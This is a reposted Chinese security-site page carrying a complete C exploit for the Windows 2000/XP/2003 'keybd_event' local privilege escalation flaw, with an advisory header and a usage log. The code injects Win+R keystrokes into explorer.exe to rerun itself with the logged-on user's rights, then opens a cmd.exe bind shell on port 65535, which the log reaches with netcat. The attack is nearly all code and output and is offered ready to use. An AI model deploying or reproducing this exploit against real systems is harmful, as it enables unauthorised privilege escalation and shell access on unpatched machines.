Microsoft Windows "keybd_event" Local Privilege Escalation Exploit

文章整理：天天安全网 作者：佚名 发布时间：2005-09-09

漏洞资料：http://www.haxorcitos.com/MSRC-6005bgs-EN.txt

危险程度：中等

影响范围：Microsoft Windows 2000/XP/2003

解决办法：暂时没有解决方案

------------------------------------------------------------------------------

/*

* Microsoft Windows keybd_event validation vulnerability.

* Local privilege elevation

*

* Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)

* I馻ki Lopez ( ilo _@_ reversing.org <http://reversing.org> )

*

* Platforms afected/tested:

*

* - Windows 2000

* - Windows XP

* - Windows 2003

*

*

* Original Advisory: http://www.haxorcitos.com

* http://www.reversing.org

*

* Exploit Date: 08 / 06 / 2005

*

* Orignal Advisory:

* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"

* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION

* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.

*

* Attack Scenario:

*

* a) An attacker who gains access to an unprivileged shell/application executed

* with the application runas.

* b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP

*

* Impact:

*

* Due to an invalid keyboard input validation, its possible to send keys to any

* application of the Desktop.

* By sending some short-cut keys its possible to execute code and elevate privileges

* getting loggued user privileges and bypass runas/service security restriction.

*

* Exploit usage:

*

* C:\>whoami

* AQUARIUS\Administrador

*

* C:\>runas /user:restricted cmd.exe

* Enter the password for restricted:

* Attempting to start cmd.exe as user "AQUARIUS\restricted" ...

*

*

* Microsoft Windows 2000 [Version.00.2195]

* (C) Copyright 1985-2000 Microsoft Corp.

*

* C:\WINNT\system32>cd \

*

* C:\>whoami

* AQUARIUS\restricted

*

* C:\>tlist.exe |find "explorer.exe"

* 1140 explorer.exe Program Manager

*

* C:\>c:\keybd.exe 1140

* HANDLE Found. Attacking =)

*

* C:\>nc localhost 65535

* Microsoft Windows 2000 [Versi??.00.2195]

* (C) Copyright 1985-2000 Microsoft Corp.

*

* C:\>whoami

* whoami

* AQUARIUS\Administrador

*

*

* DONE =)

*

*/

#include <stdio.h>

#include <string.h>

#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define HAXORCITOS 65535

unsigned int pid = 0;

char buf[256]="";

/**************************************************************/

void ExplorerExecution (HWND hwnd, LPARAM lParam){

DWORD hwndid;

int i;

GetWindowThreadProcessId(hwnd,&hwndid);

if (hwndid == pid){

/*

Replace keybd_event with SendMessage() and PostMessage() calls

*/

printf("HANDLE Found. Attacking =)\n");

SetForegroundWindow(hwnd);

keybd_event(VK_LWIN,1,0,0);

keybd_event(VkKeyScan('r'),1,0,0);

keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0);

keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0);

for(i=0;i<strlen(buf);i++) {

if (buf[i]==':') {

keybd_event(VK_SHIFT,1,0,0);

keybd_event(VkKeyScan(buf[i]),1,0,0);

keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0);

keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);

} else {

if (buf[i]=='\\') {

keybd_event(VK_LMENU,1,0,0);

keybd_event(VK_CONTROL,1,0,0);

keybd_event(VkKeyScan('?'),1,0,0);

keybd_event(VK_LMENU,1,KEYEVENTF_KEYUP,0);

keybd_event(VK_CONTROL,1,KEYEVENTF_KEYUP,0);

keybd_event(VkKeyScan('?'),1,KEYEVENTF_KEYUP,0);

} else {

keybd_event(VkKeyScan(buf[i]),1,0,0);

keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);

}

}

}

keybd_event(VK_RETURN,1,0,0);

keybd_event(VK_RETURN,1,KEYEVENTF_KEYUP,0);

exit(1);

}

}

/**************************************************************/

int BindShell(void) { //Bind Shell. POrt 65535

SOCKET s,s2;

STARTUPINFO si;

PROCESS_INFORMATION pi;

WSADATA HWSAdata;

struct sockaddr_in sa;

int len;

if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { exit(1); }

if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){

exit(1); }

sa.sin_family = AF_INET;

sa.sin_port = (USHORT)htons(HAXORCITOS);

sa.sin_addr.s_addr = htonl(INADDR_ANY);

len=sizeof(sa);

if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {

return(-1); }

if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); }

s2 = accept(s,(struct sockaddr *)&sa,&len);

closesocket(s);

ZeroMemory( &si, sizeof(si) ); ZeroMemory( &pi, sizeof(pi) );

si.cb = sizeof(si);

si.wShowWindow = SW_HIDE;

si.dwFlags =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

si.hStdInput = (void *) s2; // SOCKET

si.hStdOutput = (void *) s2;

si.hStdError = (void *) s2;

if (!CreateProcess( NULL ,"cmd.exe",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) {

doFormatMessage(GetLastError());

return(-1);

}

WaitForSingleObject( pi.hProcess, INFINITE );

closesocket(s);

closesocket(s2);

printf("SALIMOS...\n");

Sleep(5000);

return(1);

}

/**************************************************************/

void main(int argc, char* argv[])

{

HWND console_wnd = NULL;

if (argc >= 2) {

pid = atoi (argv[1]);

strncpy(buf,argv[0],sizeof(buf)-1);

EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd));

} else {

BindShell();

}

}

/**************************************************************/

• ·局域网批处理应用-at版
• ·局域网批处理应用-psexec版
• ·search engine optimizat
• ·递归遍历某一路径下的所有文件
• ·c语言学习零碎整理(7):数组名是指针吗?
• ·求----关于汽车加油站工作模拟算法
• ·在Windows 2000 Pro中监控和管理
• ·如何获取当前程序文件的路径 Current P
• ·关于IEWebControls的安装及一些应用
• ·Visual C++模态对话框消息处理机制的分